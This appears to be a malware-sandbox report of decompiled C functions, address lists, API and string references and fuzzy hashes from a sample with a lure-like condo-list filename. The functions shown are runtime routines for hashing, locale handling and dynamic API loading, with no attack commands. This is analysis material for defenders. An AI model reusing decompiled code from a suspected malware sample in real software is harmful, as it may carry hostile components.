Download Yara Rule

C-Code - Quality: 100%

			E004323DC(signed int* __eax, intOrPtr __ecx, signed int __edx) {
				signed int* _v8;
				signed int* _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				unsigned int* _t96;
				unsigned int* _t106;
				signed int* _t108;
				signed int _t109;

				_t109 = __edx;
				_v16 = __ecx;
				_v12 = __eax;
				_t106 =  &_v24;
				_t108 =  &_v28;
				_t96 =  &_v20;
				 *_t96 = __edx + 0xdeadbeef + _v16;
				 *_t106 =  *_t96;
				 *_t108 =  *_t96;
				_v8 = _v12;
				if((_v8 & 0x00000003) != 0) {
					if(__edx <= 0xc) {
						L20:
						if(_t109 > 0xc) {
							L23:
							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 0x18);
							L24:
							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 0x10);
							L25:
							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 8);
							L26:
							 *_t108 =  *_t108 + (_v8[2] & 0x000000ff);
							L27:
							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 0x18);
							L28:
							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 0x10);
							L29:
							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 8);
							L30:
							 *_t106 =  *_t106 + (_v8[1] & 0x000000ff);
							L31:
							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 0x18);
							L32:
							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 0x10);
							L33:
							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 8);
							L34:
							 *_t96 =  *_t96 + ( *_v8 & 0x000000ff);
							L35:
							 *_t108 =  *_t108 ^  *_t106;
							 *_t108 =  *_t108 - ( *_t106 << 0x0000000e |  *_t106 >> 0x00000012);
							 *_t96 =  *_t96 ^  *_t108;
							 *_t96 =  *_t96 - ( *_t108 << 0x0000000b |  *_t108 >> 0x00000015);
							 *_t106 =  *_t106 ^  *_t96;
							 *_t106 =  *_t106 - ( *_t96 << 0x00000019 |  *_t96 >> 0x00000007);
							 *_t108 =  *_t108 ^  *_t106;
							 *_t108 =  *_t108 - ( *_t106 << 0x00000010 |  *_t106 >> 0x00000010);
							 *_t96 =  *_t96 ^  *_t108;
							 *_t96 =  *_t96 - ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
							 *_t106 =  *_t106 ^  *_t96;
							 *_t106 =  *_t106 - ( *_t96 << 0x0000000e |  *_t96 >> 0x00000012);
							 *_t108 =  *_t108 ^  *_t106;
							 *_t108 =  *_t108 - ( *_t106 << 0x00000018 |  *_t106 >> 0x00000008);
							return  *_t108;
						}
						switch( *((intOrPtr*)(_t109 * 4 +  &M00432749))) {
							case 0:
								return  *_t108;
							case 1:
								goto L34;
							case 2:
								goto L33;
							case 3:
								goto L32;
							case 4:
								goto L31;
							case 5:
								goto L30;
							case 6:
								goto L29;
							case 7:
								goto L28;
							case 8:
								goto L27;
							case 9:
								goto L26;
							case 0xa:
								goto L25;
							case 0xb:
								goto L24;
							case 0xc:
								goto L23;
						}
					} else {
						goto L19;
					}
					do {
						L19:
						 *_t96 =  *_t96 + ( *_v8 & 0x000000ff) + ((_v8[0] & 0x000000ff) << 8) + ((_v8[0] & 0x000000ff) << 0x10) + ((_v8[0] & 0x000000ff) << 0x18);
						 *_t106 =  *_t106 + (_v8[1] & 0x000000ff) + ((_v8[1] & 0x000000ff) << 8) + ((_v8[1] & 0x000000ff) << 0x10) + ((_v8[1] & 0x000000ff) << 0x18);
						 *_t108 =  *_t108 + (_v8[2] & 0x000000ff) + ((_v8[2] & 0x000000ff) << 8) + ((_v8[2] & 0x000000ff) << 0x10) + ((_v8[2] & 0x000000ff) << 0x18);
						 *_t96 =  *_t96 -  *_t108;
						 *_t96 =  *_t96 ^ ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
						 *_t108 =  *_t108 +  *_t106;
						 *_t106 =  *_t106 -  *_t96;
						 *_t106 =  *_t106 ^ ( *_t96 << 0x00000006 |  *_t96 >> 0x0000001a);
						 *_t96 =  *_t96 +  *_t108;
						 *_t108 =  *_t108 -  *_t106;
						 *_t108 =  *_t108 ^ ( *_t106 << 0x00000008 |  *_t106 >> 0x00000018);
						 *_t106 =  *_t106 +  *_t96;
						 *_t96 =  *_t96 -  *_t108;
						 *_t96 =  *_t96 ^ ( *_t108 << 0x00000010 |  *_t108 >> 0x00000010);
						 *_t108 =  *_t108 +  *_t106;
						 *_t106 =  *_t106 -  *_t96;
						 *_t106 =  *_t106 ^ ( *_t96 << 0x00000013 |  *_t96 >> 0x0000000d);
						 *_t96 =  *_t96 +  *_t108;
						 *_t108 =  *_t108 -  *_t106;
						 *_t108 =  *_t108 ^ ( *_t106 << 0x00000004 |  *_t106 >> 0x0000001c);
						 *_t106 =  *_t106 +  *_t96;
						_t109 = _t109 - 0xc;
						_v8 =  &(_v8[3]);
					} while (_t109 > 0xc);
					goto L20;
				}
				if(__edx <= 0xc) {
					L3:
					if(_t109 > 0xc) {
						goto L35;
					}
					switch( *((intOrPtr*)(_t109 * 4 +  &M004324DD))) {
						case 0:
							return  *_t108;
						case 1:
							_v8 =  *_v8;
							__edx =  *_v8 & 0x000000ff;
							 *__eax =  *__eax + ( *_v8 & 0x000000ff);
							goto L35;
						case 2:
							_v8 =  *_v8;
							__edx =  *_v8 & 0x0000ffff;
							 *__eax =  *__eax + ( *_v8 & 0x0000ffff);
							goto L35;
						case 3:
							_v8 =  *_v8;
							__edx =  *_v8 & 0x00ffffff;
							 *__eax =  *__eax + ( *_v8 & 0x00ffffff);
							goto L35;
						case 4:
							_v8 =  *_v8;
							 *__eax =  *__eax +  *_v8;
							goto L35;
						case 5:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							__edx =  *(__edx + 4);
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 6:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							__edx =  *(__edx + 4);
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 7:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							__edx =  *(__edx + 4);
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 8:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 9:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							__edx =  *(__edx + 8);
							 *__ecx =  *__ecx + __edx;
							goto L35;
						case 0xa:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							__edx =  *(__edx + 8);
							 *__ecx =  *__ecx + __edx;
							goto L35;
						case 0xb:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							__edx =  *(__edx + 8);
							 *__ecx =  *__ecx + __edx;
							goto L35;
						case 0xc:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							 *__ecx =  *__ecx + __edx;
							goto L35;
					}
				} else {
					goto L2;
				}
				do {
					L2:
					 *_t96 =  *_t96 +  *_v8;
					 *_t106 =  *_t106 + _v8[1];
					 *_t108 =  *_t108 + _v8[2];
					 *_t96 =  *_t96 -  *_t108;
					 *_t96 =  *_t96 ^ ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
					 *_t108 =  *_t108 +  *_t106;
					 *_t106 =  *_t106 -  *_t96;
					 *_t106 =  *_t106 ^ ( *_t96 << 0x00000006 |  *_t96 >> 0x0000001a);
					 *_t96 =  *_t96 +  *_t108;
					 *_t108 =  *_t108 -  *_t106;
					 *_t108 =  *_t108 ^ ( *_t106 << 0x00000008 |  *_t106 >> 0x00000018);
					 *_t106 =  *_t106 +  *_t96;
					 *_t96 =  *_t96 -  *_t108;
					 *_t96 =  *_t96 ^ ( *_t108 << 0x00000010 |  *_t108 >> 0x00000010);
					 *_t108 =  *_t108 +  *_t106;
					 *_t106 =  *_t106 -  *_t96;
					 *_t106 =  *_t106 ^ ( *_t96 << 0x00000013 |  *_t96 >> 0x0000000d);
					 *_t96 =  *_t96 +  *_t108;
					 *_t108 =  *_t108 -  *_t106;
					 *_t108 =  *_t108 ^ ( *_t106 << 0x00000004 |  *_t106 >> 0x0000001c);
					 *_t106 =  *_t106 +  *_t96;
					_t109 = _t109 - 0xc;
					_v8 = _v8 + 0xc;
				} while (_t109 > 0xc);
				goto L3;
			}

0x004323dc
0x004323e5
0x004323e8
0x004323eb
0x004323ee
0x004323f1
0x004323ff
0x00432403
0x00432407
0x0043240c
0x00432413
0x0043261d
0x0043273d
0x00432740
0x00432784
0x0043278e
0x00432790
0x0043279a
0x0043279c
0x004327a6
0x004327a8
0x004327af
0x004327b1
0x004327bb
0x004327bd
0x004327c7
0x004327c9
0x004327d3
0x004327d5
0x004327dc
0x004327de
0x004327e8
0x004327ea
0x004327f4
0x004327f6
0x00432800
0x00432802
0x00432808
0x0043280a
0x0043280c
0x0043281a
0x0043281e
0x0043282c
0x00432830
0x0043283e
0x00432842
0x00432850
0x00432854
0x00432862
0x00432866
0x00432874
0x00432878
0x00432886
0x00000000
0x00432888
0x00432742
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00432623
0x00432623
0x0043264d
0x0043267a
0x004326a7
0x004326ab
0x004326b9
0x004326bd
0x004326c1
0x004326cf
0x004326d3
0x004326d7
0x004326e5
0x004326e9
0x004326ed
0x004326fb
0x004326ff
0x00432703
0x00432711
0x00432715
0x00432719
0x00432727
0x0043272b
0x0043272d
0x00432730
0x00432734
0x00000000
0x00432623
0x0043241c
0x004324cd
0x004324d0
0x00000000
0x00000000
0x004324d6
0x00000000
0x00000000
0x00000000
0x0043251b
0x0043251d
0x00432523
0x00000000
0x00000000
0x0043252d
0x0043252f
0x00432535
0x00000000
0x00000000
0x0043253f
0x00432541
0x00432547
0x00000000
0x00000000
0x00432551
0x00432553
0x00000000
0x00000000
0x0043255a
0x0043255f
0x00432561
0x0043256a
0x00000000
0x00000000
0x00432571
0x00432576
0x00432578
0x00432581
0x00000000
0x00000000
0x00432588
0x0043258d
0x0043258f
0x00432598
0x00000000
0x00000000
0x0043259f
0x004325a4
0x004325a9
0x00000000
0x00000000
0x004325b0
0x004325b5
0x004325ba
0x004325bc
0x004325c5
0x00000000
0x00000000
0x004325cc
0x004325d1
0x004325d6
0x004325d8
0x004325e1
0x00000000
0x00000000
0x004325e8
0x004325ed
0x004325f2
0x004325f4
0x004325fd
0x00000000
0x00000000
0x00432604
0x00432609
0x0043260e
0x00432613
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00432422
0x00432422
0x00432427
0x0043242f
0x00432437
0x0043243b
0x00432449
0x0043244d
0x00432451
0x0043245f
0x00432463
0x00432467
0x00432475
0x00432479
0x0043247d
0x0043248b
0x0043248f
0x00432493
0x004324a1
0x004324a5
0x004324a9
0x004324b7
0x004324bb
0x004324bd
0x004324c0
0x004324c4
0x00000000

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33b0767fec04d2cc36286a41c43eb0d38f805e6e14f2767db37a63931b683382
Instruction ID: db30b7f2ad9068286955554028b9aaa685d7675e6c5eb7ed9f8bac599936a457
Opcode Fuzzy Hash: 33b0767fec04d2cc36286a41c43eb0d38f805e6e14f2767db37a63931b683382
Instruction Fuzzy Hash: 9402E032900235DFDB96CF69C140149B7B6FF8A32472A82D2D854AB229D270BE52DFD1

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9C4, Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3027258f69a45e47f11e6ef411682183d8681a3ba960b00656adada6bea5bd6d
Instruction ID: d9bdd0ffc78bce1da46a164adb44ca0a352dc4e9e15995579375b7a7492e944c
Opcode Fuzzy Hash: 3027258f69a45e47f11e6ef411682183d8681a3ba960b00656adada6bea5bd6d
Instruction Fuzzy Hash: FB61A7456AE7C66FCB07C33008B81D6AF61AE9325478B53EFC8C58A493D10D281EE363

Uniqueness

Uniqueness Score: -1.00%

Function 00405AE0, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
Instruction ID: c1f34be03cf0569538104f0038f02cfb84df381903d0011f2ebedd3a3241928c
Opcode Fuzzy Hash: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
Instruction Fuzzy Hash: 76C0E9B550D6066E975C8F1AB480815FBE5FAC8324364C22EA01C83644D73154518A64

Uniqueness

Uniqueness Score: -1.00%

Function 00427874, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00427874() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleW(L"oleaut32.dll");
				 *0x4c1134 = E00427848("VariantChangeTypeEx", E00427264, _t91);
				 *0x4c1138 = E00427848("VarNeg", E004272AC, _t91);
				 *0x4c113c = E00427848("VarNot", E004272AC, _t91);
				 *0x4c1140 = E00427848("VarAdd", E004272B8, _t91);
				 *0x4c1144 = E00427848("VarSub", E004272B8, _t91);
				 *0x4c1148 = E00427848("VarMul", E004272B8, _t91);
				 *0x4c114c = E00427848("VarDiv", E004272B8, _t91);
				 *0x4c1150 = E00427848("VarIdiv", E004272B8, _t91);
				 *0x4c1154 = E00427848("VarMod", E004272B8, _t91);
				 *0x4c1158 = E00427848("VarAnd", E004272B8, _t91);
				 *0x4c115c = E00427848("VarOr", E004272B8, _t91);
				 *0x4c1160 = E00427848("VarXor", E004272B8, _t91);
				 *0x4c1164 = E00427848("VarCmp", E004272C4, _t91);
				 *0x4c1168 = E00427848("VarI4FromStr", E004272D0, _t91);
				 *0x4c116c = E00427848("VarR4FromStr", E0042733C, _t91);
				 *0x4c1170 = E00427848("VarR8FromStr", E004273AC, _t91);
				 *0x4c1174 = E00427848("VarDateFromStr", E0042741C, _t91);
				 *0x4c1178 = E00427848("VarCyFromStr", E0042748C, _t91);
				 *0x4c117c = E00427848("VarBoolFromStr", E004274FC, _t91);
				 *0x4c1180 = E00427848("VarBstrFromCy", E0042757C, _t91);
				 *0x4c1184 = E00427848("VarBstrFromDate", E00427624, _t91);
				_t46 = E00427848("VarBstrFromBool", E004277B4, _t91);
				 *0x4c1188 = _t46;
				return _t46;
			}

0x00427882
0x00427896
0x004278ac
0x004278c2
0x004278d8
0x004278ee
0x00427904
0x0042791a
0x00427930
0x00427946
0x0042795c
0x00427972
0x00427988
0x0042799e
0x004279b4
0x004279ca
0x004279e0
0x004279f6
0x00427a0c
0x00427a22
0x00427a38
0x00427a4e
0x00427a5e
0x00427a64
0x00427a6b

APIs

GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 0042787D

Part of subcall function 00427848: GetProcAddress.KERNEL32(00000000), ref: 00427861

Strings

VarBstrFromCy, xrefs: 00427A2D
VarBstrFromDate, xrefs: 00427A43
VarAnd, xrefs: 00427951
VarCyFromStr, xrefs: 00427A01
VariantChangeTypeEx, xrefs: 0042788B
VarIdiv, xrefs: 00427925
VarR4FromStr, xrefs: 004279BF
VarMod, xrefs: 0042793B
VarI4FromStr, xrefs: 004279A9
VarSub, xrefs: 004278E3
VarBoolFromStr, xrefs: 00427A17
VarDateFromStr, xrefs: 004279EB
VarNot, xrefs: 004278B7
VarNeg, xrefs: 004278A1
VarCmp, xrefs: 00427993
VarR8FromStr, xrefs: 004279D5
VarAdd, xrefs: 004278CD
VarOr, xrefs: 00427967
VarBstrFromBool, xrefs: 00427A59
VarMul, xrefs: 004278F9
VarXor, xrefs: 0042797D
oleaut32.dll, xrefs: 00427878
VarDiv, xrefs: 0042790F

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
Instruction ID: afb448a43cf45882875cbd5333393c9475fd06a837c60371df2c799b3a2ca9d5
Opcode Fuzzy Hash: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
Instruction Fuzzy Hash: 4741442078D2689A53007BAA3C0692A7B9CD64A7243E0E07FF5048B766DF7CAC40867D

Uniqueness

Uniqueness Score: -1.00%

Function 0041E7CC, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 194
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041E7CC(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, long long __fp0) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _t32;
				signed int _t53;
				signed int _t56;
				signed int _t71;
				signed int _t78;
				signed int* _t82;
				signed int _t85;
				void* _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				void* _t105;
				intOrPtr _t106;
				signed int _t109;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t131;
				void* _t132;
				signed int _t134;
				void* _t136;
				void* _t137;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				void* _t142;
				long long _t161;

				_t161 = __fp0;
				_t126 = __edi;
				_t109 = __edx;
				_t139 = _t140;
				_t141 = _t140 + 0xfffffff0;
				_push(__edi);
				_v12 = 0;
				_v8 = __edx;
				_t93 = __eax;
				_push(_t139);
				_push(0x41ea61);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141;
				_t32 =  *0x4ba590; // 0x4bb8f8
				_t144 =  *_t32;
				if( *_t32 == 0) {
					E0040554C(0x1a);
				}
				E00406688(E0040690C( *0x4be7e4, 0, _t126), _t109 | 0xffffffff, _t144);
				_push(_t139);
				_push(0x41ea44);
				_push( *[fs:edx]);
				 *[fs:edx] = _t141;
				 *0x4be7dc = 0;
				_push(0);
				E00409C00();
				_t142 = _t141 + 4;
				E0041E034(_t93, 0x41ea7c, 0x100b,  &_v12);
				_t127 = E0041A1C4(0x41ea7c, 1, _t144);
				if(_t127 + 0xfffffffd - 3 >= 0) {
					__eflags = _t127 - 0xffffffffffffffff;
					if(_t127 - 0xffffffffffffffff < 0) {
						 *0x4be7dc = 1;
						_push(1);
						E00409C00();
						_t142 = _t142 + 4;
						E00407E00( *0x4be7e0, L"B.C.");
						 *((intOrPtr*)( *0x4be7e0 + 4)) = 0;
						_t71 =  *0x4be7e0;
						 *((intOrPtr*)(_t71 + 8)) = 0xffc00000;
						 *((intOrPtr*)(_t71 + 0xc)) = 0xc1dfffff;
						E0041C1C4(1, 1, 1, __eflags, _t161);
						_v20 = E00405790();
						_v16 = 1;
						asm("fild qword [ebp-0x10]");
						 *((long long*)( *0x4be7e0 + 0x10)) = _t161;
						asm("wait");
						EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
						_t78 =  *0x4be7e0;
						__eflags = _t78;
						if(_t78 != 0) {
							_t82 = _t78 - 4;
							__eflags = _t82;
							_t78 =  *_t82;
						}
						_t134 = _t78 - 1;
						__eflags = _t134;
						if(_t134 > 0) {
							_t98 = 1;
							do {
								 *((intOrPtr*)( *0x4be7e0 + 4 + (_t98 + _t98 * 2) * 8)) = 0xffffffff;
								_t98 = _t98 + 1;
								_t134 = _t134 - 1;
								__eflags = _t134;
							} while (_t134 != 0);
						}
						EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
					}
				} else {
					EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
					_t85 =  *0x4be7e0;
					if(_t85 != 0) {
						_t85 =  *(_t85 - 4);
					}
					_t136 = _t85 - 1;
					if(_t136 >= 0) {
						_t137 = _t136 + 1;
						_t99 = 0;
						do {
							 *((intOrPtr*)( *0x4be7e0 + 4 + (_t99 + _t99 * 2) * 8)) = 0xffffffff;
							_t99 = _t99 + 1;
							_t137 = _t137 - 1;
						} while (_t137 != 0);
					}
					EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
				}
				_t94 =  *0x4be7e0;
				if(_t94 != 0) {
					_t94 =  *(_t94 - 4);
				}
				_push(_t94);
				E00409C00();
				_t53 =  *0x4be7e0;
				if(_t53 != 0) {
					_t53 =  *(_t53 - 4);
				}
				_t131 = _t53 - 1;
				if(_t131 >= 0) {
					_t132 = _t131 + 1;
					_t95 = 0;
					do {
						_t127 = _t95 + _t95 * 2;
						_t106 =  *0x416e18; // 0x416e1c
						E00408F5C( *((intOrPtr*)(_v8 + 0xbc)) + (_t95 + _t95 * 2) * 8, _t106,  *0x4be7e0 + (_t95 + _t95 * 2) * 8);
						_t95 = _t95 + 1;
						_t132 = _t132 - 1;
					} while (_t132 != 0);
				}
				_t116 =  *0x41e600; // 0x41e604
				E00409D24(0x4be7e0, _t116);
				_t56 =  *0x4be7e0;
				if(_t56 != 0) {
					_t56 =  *(_t56 - 4);
				}
				 *0x4be7dc = _t56;
				_pop(_t117);
				_pop(_t105);
				 *[fs:eax] = _t117;
				_push(0x41ea4b);
				return E00406868( *0x4be7e4, _t105, _t127);
			}

0x0041e7cc
0x0041e7cc
0x0041e7cc
0x0041e7cd
0x0041e7cf
0x0041e7d4
0x0041e7d7
0x0041e7da
0x0041e7dd
0x0041e7e1
0x0041e7e2
0x0041e7e7
0x0041e7ea
0x0041e7ed
0x0041e7f2
0x0041e7f5
0x0041e7f9
0x0041e7f9
0x0041e80b
0x0041e812
0x0041e813
0x0041e818
0x0041e81b
0x0041e820
0x0041e826
0x0041e837
0x0041e83c
0x0041e84f
0x0041e861
0x0041e86b
0x0041e8c8
0x0041e8cb
0x0041e8d6
0x0041e8dc
0x0041e8ed
0x0041e8f2
0x0041e8ff
0x0041e90b
0x0041e90e
0x0041e913
0x0041e91a
0x0041e92d
0x0041e937
0x0041e93a
0x0041e93d
0x0041e945
0x0041e948
0x0041e957
0x0041e95c
0x0041e961
0x0041e963
0x0041e965
0x0041e965
0x0041e968
0x0041e968
0x0041e96c
0x0041e96d
0x0041e96f
0x0041e971
0x0041e976
0x0041e97f
0x0041e987
0x0041e988
0x0041e988
0x0041e988
0x0041e976
0x0041e999
0x0041e999
0x0041e86d
0x0041e87b
0x0041e880
0x0041e887
0x0041e88c
0x0041e88c
0x0041e890
0x0041e893
0x0041e895
0x0041e896
0x0041e898
0x0041e8a1
0x0041e8a9
0x0041e8aa
0x0041e8aa
0x0041e898
0x0041e8bb
0x0041e8bb
0x0041e9a3
0x0041e9a7
0x0041e9ac
0x0041e9ac
0x0041e9ae
0x0041e9c2
0x0041e9ca
0x0041e9d1
0x0041e9d6
0x0041e9d6
0x0041e9da
0x0041e9dd
0x0041e9df
0x0041e9e0
0x0041e9e2
0x0041e9e2
0x0041e9fa
0x0041ea00
0x0041ea05
0x0041ea06
0x0041ea06
0x0041e9e2
0x0041ea0e
0x0041ea14
0x0041ea19
0x0041ea20
0x0041ea25
0x0041ea25
0x0041ea27
0x0041ea2e
0x0041ea30
0x0041ea31
0x0041ea34
0x0041ea43

APIs

GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E870
EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E87B
GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8B0
EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8BB
GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E94C
EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E957
GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E98E
EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E999

Strings

ToA, xrefs: 0041E9BC
B.C., xrefs: 0041E8FA
K, xrefs: 0041E8DD
K, xrefs: 0041EA09
K, xrefs: 0041E827

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CalendarEnumInfoLocaleThread
String ID: B.C.$ToA$K$K$K
API String ID: 683597275-1724967715
Opcode ID: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
Instruction ID: 5f9a2d1895d99171d8daf0119b8bb3b5d98f795b9e196a74a36fcd0882631485
Opcode Fuzzy Hash: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
Instruction Fuzzy Hash: 3061D7786002009FD710EF2BCC85AD677A9FB84354B518A7AFC019B3A6CB78DC41CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040A250, Relevance: 21.0, APIs: 8, Strings: 4, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A250() {
				signed int _t2;
				_Unknown_base(*)()* _t8;

				InitializeCriticalSection(0x4bdc10);
				 *0x4bdc28 = 0x7f;
				_t2 = GetVersion() & 0x000000ff;
				 *0x4bdc0c = _t2 - 6 >= 0;
				if( *0x4bdc0c != 0) {
					 *0x4bdc00 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadPreferredUILanguages");
					 *0x4bdc04 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetThreadPreferredUILanguages");
					_t8 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadUILanguage");
					 *0x4bdc08 = _t8;
					return _t8;
				}
				return _t2;
			}

0x0040a255
0x0040a25a
0x0040a268
0x0040a270
0x0040a27e
0x0040a295
0x0040a2af
0x0040a2c4
0x0040a2c9
0x00000000
0x0040a2c9
0x0040a2ce

APIs

InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
